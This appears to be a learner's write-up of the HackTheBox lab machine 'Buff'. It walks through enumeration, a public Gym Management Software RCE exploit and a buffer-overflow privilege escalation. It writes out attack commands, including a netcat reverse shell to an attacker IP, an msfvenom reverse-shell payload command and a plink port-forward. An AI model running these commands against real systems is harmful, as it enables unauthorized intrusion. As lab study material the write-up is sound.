Buff (HTB)
first hackthebox machine :) I've been loyal to tryhackme for awhile but it's time to expand my learning resources
HackTheBox – Buff Write-Up
topics: web application security, Windows Privilege Escalation, port forwarding, public exploits, buffer overflows
Enumeration
Local Privilege Escalation
System Privilege Escalation
new tools: plink
tools: nmapAutomator, dirsearch, searchsploit, curl, python, msfvenom
Enumeration
initial nmap scan ./nmapAutomator.sh $ip Basic
We have one port (8080 http alt) open running an Apache server, a Win64 version with implementation 2.4.43. We can see the http-title is mrb3n's Bro Hut, we can assume that mrb3n is a potential username. Lets run a vulnerability scan and visit the homepage.
./nmapAutomator.sh $ip Vulns
python3 dirsearch.py -u $ip -e php,html,txt
There are several subdirectories that are not visible on the homepage, including places like upload.php and register.php, insinuating locations to potentially upload a shell. I didn't find anything on my initial inspection of the visible tabs on the homepage, so lets visit some of these pages.
I visited upload.php first, as it could potentially be the fastest way to achieve a shell.
There is an error message on this page. It says it doesn't recognize the parameter id in the page source code. This could be an LFI vulnerability or allow us to upload a file of our choosing. We know the server hosting the website is Apache, lets attempt to find what platform the website was built with to get more information.
Checking the main tabs on the homepage one more time, on the contact.php page we see the following message.
Local Privilege Escalation
Lets use searchsploit
to search for Gym Management Software
Inspecting the python file reveals the following RCE vulnerability
python /usr/share/exploitdb/exploits/php/webapps/48506.py http://10.10.10.198:8080/
The exploit works by tricking the server into uploading an image extension (PNG) by manipulating the Content-Type in the GET request. What the python program actually does is use PHP to fetch the system shell, which is executed as a PNG extension. We'll have to upgrade to a secure shell.
The exploit lists the parameter /upload/kamehameha.php?telepathy= to interact with the shell to execute commands. Lets attempt to place a netcat executable and send cmd back with the URL.
On the attacker, copy the nc.exe executable to the working directory, start a python server. On the victim download nc.exe with curl and output the file to nc.exe. Listen for the shell on the desired port and enter "http://10.10.10.198:8080/upload/kamehameha.php?telepathy= nc.exe 10.10.15.16 4445 -e cmd.exe" in the URL.
Administrator Privilege Escalation
Lets find out the CPU architecture of the machine in order to transfer and run winPEAS.
wmic OS get OSArchitecture
We are unable to transfer the file with smbserver, lets try certutil
Our two main methods of transferring files on Windows machines is disabled. Lets try and enumerate the user folders for something immediate before trying to run a privesc script.
There is nothing else in the Desktop folder besides the user flag. There was a batch file in the Documents folder but based on the message, I'm assuming it's necessary for the website platform.
There is an executable file in the Downloads folder, checking the syntax with searchsploit
immediately reveals a buffer overflow exploit.
The exploit is written in python but python is not installed on the victim. In order to use this exploit, we'll have to port forward on our local machine. We can use the tool plink to do this (the default plink on kali is outdated). Transfer the windows executable from Kali with the original shell and run the command
plink.exe -l kali -pw kali 10.10.15.16 -R 8888:127.0.0.1:8888
The payload provides the msfvenom
command to create a custom payload. We have a netcat executable on the machine already, lets use that in place of CMD.
msfvenom -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.15.16 4444' -b '\x00\x0a\x0d' -f py -v payload
Replace the payload section of 48389.py with the above output, listen for the shell and run the exploit
Last updated